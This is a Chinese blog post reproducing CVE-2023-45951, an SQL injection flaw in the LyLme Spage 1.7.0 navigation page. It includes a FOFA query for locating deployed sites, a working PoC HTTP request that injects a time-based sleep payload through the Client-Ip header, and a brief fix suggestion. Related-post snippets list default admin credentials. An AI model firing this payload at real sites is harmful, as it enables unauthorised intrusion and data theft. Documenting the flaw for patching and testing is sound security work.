六零导航页SQL注入漏洞复现(CVE-2023-45951)

已于 2023-10-26 22:26:40 修改
阅读量1.6k 收藏 2
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-10-26 21:09:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134064295
版权

0x01 产品简介

   LyLme Spage(六零导航页)是中国六零(LyLme)开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。

0x02 漏洞概述

   LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。

0x03 影响范围

LyLme Spage 1.7.0

0x04 复现环境

FOFA:title=="上网导航 - LyLme Spage"

0x05 漏洞复现

PoC

POST /apply/index.php?submit=post HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Client-Ip: 0'>if(1,sleep(10),2)>'

url=http%3A%2F%2Fbaidu.com&name=test&group_id=1&icon=&authcode=

延时10秒 

PS:漏洞存在于 HTTP Header 的 Client-Ip 字段,请求体中url字段值每请求一次就需要更换一次,不然无法成功

0x06 修复建议 

 在get_real_ip 中检查验证IP合法性,防止SQL注入

0xSecl
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 NetScaler Gateway 14.1-12.35 及更高版本 NetScaler ADC 和 NetScaler Gateway 13.1-51.15 及更高版本的 13.1 NetScaler ADC 和 NetScaler Gateway 13.0-92.21 及更高版本的 13.0 NetScaler ADC 13.1-FIPS 13.1-37.176 及更高版本的 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1- 版本:Citrix ADC-13.0-92.21
六零导航网站页面模板(LyLme Spage)源码
05-12
六零导航网站页面模板(LyLme Spage)源码 安装教程: 1. 上传源码到网站根目录解压 2. 访问http://www.a5ymg.cn/install 3. 按提示配置数据库安装 后台账号密码:www.diyiyuanma.cn/admin/123456 更新教程: 1. 下载更新包lylme_spage_update_www.lmtaolu.cn_xxxx.zip,上传至根目录解压(不要删除原来的文件,直接覆盖) 2. 登录后台=>首页=》更新提示=》点击【我已上传更新包,更新数据库】 3. 等待网站提示更新成功即可正常使用 3月27日更新说明: 更新 版本号为 v1.1.3 优化 部分文件代码结构 修改 MySQL连接方式为PDO 增加 申请收录功能 增加 新模板lylme 修复 部分错误
Citrix ADC和Citrix Gateway 远程代码执行漏洞(CVE-2023-3519)修复方案
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
07-27 817
根据安全部门的通知,近日我们监测到Citrix ADC 及 Citrix Gateway 远程代码执行漏洞(CVE-2023-3519),Citrix ADC 及 Citrix Gateway 中存在远程代码执行漏洞,远程未授权攻击者可利用此漏洞在目标设备上执行任意代码。 是您要创建的策略的名称, 是权限的级别,可以是 READ-ONLY、BASIC 或 ALL。1、可根据该漏洞进入之后进入shell模式,进而进一步进入CLI模式。6、升级后重启即可。
CVE』简析CVE-2023-48795:SSH协议前缀截断攻击(Terrapin攻击)
最新发布
Ho1aAs‘s Blog
12-25 6356
简析CVE-2023-48795:SSH协议前缀截断攻击(Terrapin攻击)
【PHP源码】六零导航页(LyLme Spage) 简洁高效的上网导航系统
六零博客
02-27 1681
六零导航页 (LyLme Spage)致力于简洁高效无广告的上网导航和搜索入口,沉淀最具价值链接,全站无商业推广,简约而不简单。
六零导航网-简约网站导航
03-30
安装教程: 1. 上传源码到网站根目录解压 2. 访问http://域名/install 3. 按提示配置数据库安装 后台账号密码:admin/123456
六零导航页(LyLme Spage)导航网站源码
向上力
03-10 974
页 (LyLme Spage)前端基于D.Young的 5IUX搜索 ,后台使用笔下光年的Light Year Admin。开发,包含多种搜索引擎,致力于简洁高效无广告的上网导航和搜索入口,沉淀最具价值链接,全站无商业推广,简约而不简单。3、每次Cron任务执行后会将Bing每日一图保存到assets/img/background.jpg。1、在后台将背景地址修改为 ./assets/img/background.jpg。安装环境:PHP5.4及以上,Mysql。
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5391
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
六零导航页 (LyLme Spage) php源码下载
dogeven的博客
03-20 875
六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,支持根据自己需要修改,打开思路!下载地址:https://wwwf.lanzout.com/iQYY20qmwvmj。文件配置秘钥,然后添加一个每天执行的。返回的会导致后续加载速度慢。按提示配置数据库进行安装。上传到网站根目录解压。
【Citrix篇】1-Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
chen_yunan的博客
08-11 2366
Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
[漏洞分析] CVE-2023-38545 curl“史上最严重的漏洞“分析
Breeze的博客
10-13 4252
分析与复现curl"史上最严重漏洞"CVE-2023-38545
从F5 BIG-IP RCE漏洞CVE-2023-46747)来看请求走私的利用价值
C20220511的博客
11-08 964
关于绕过权限之后F5 BIG-IP执行命令的逻辑在F5历史漏洞CVE-2022-1388中已经使用过,其实F5 BIG-IP本身就提供了接口/mgmt/tm/util/bash为后台用户执行系统命令的,有兴趣的读者也可以看https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg了解详细的创建用户和后台命令执行的逻辑。从图2.3可以看出,整个AJP请求走私的流程是可以把一个HTTP请求经过AJP代理转化之后转化为两个AJP请求,这也是请求走私名字的来源。
CVE-2023-38545 && CVE-2023-38546 漏洞原理及影响范围
BGiscool的博客
10-11 1797
由于一个错误,在缓慢的SOCKS5握手过程中,表示“让主机解析名称”的本地变量可能会得到错误的值,并且与目的相反,将过长的主机名复制到目标缓冲区,而不是仅复制已解析的地址。如果源句柄未从磁盘上的特定文件读取任何 Cookie,则克隆版本的句柄会将文件名存储为 (使用四个 ASCII 字母,不带引号)。随后使用克隆的句柄(如果未显式设置要从中加载 cookie 的源)会无意中从名为 - 如果此类文件存在并且可以使用 libcurl 在程序的当前目录中读取。libcurl 7.69.0至8.3.0。
六零导航页(LyLme Spage)导航网站源码
m0_57941469的博客
10-21 1215
安装教程: 1. 上传源码到网站根目录解压 2. 访问http://域名/install 3. 按提示配置数据库安装 后台账号密码:admin/123456更新教程: 1. 下载更新包lylme_spage_update_xxxx.zip,上传至根目录解压(不要删除原来的文件,直接覆盖) 2. 登录后台=>首页=》更新提示=》点击【我已上传更新包,更新数据库】 3. 等待网站提示更新成功即可正常使用后续版本将支持一键更新Gitee码云:https://gitee.com/LyLme/lylme_spage
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值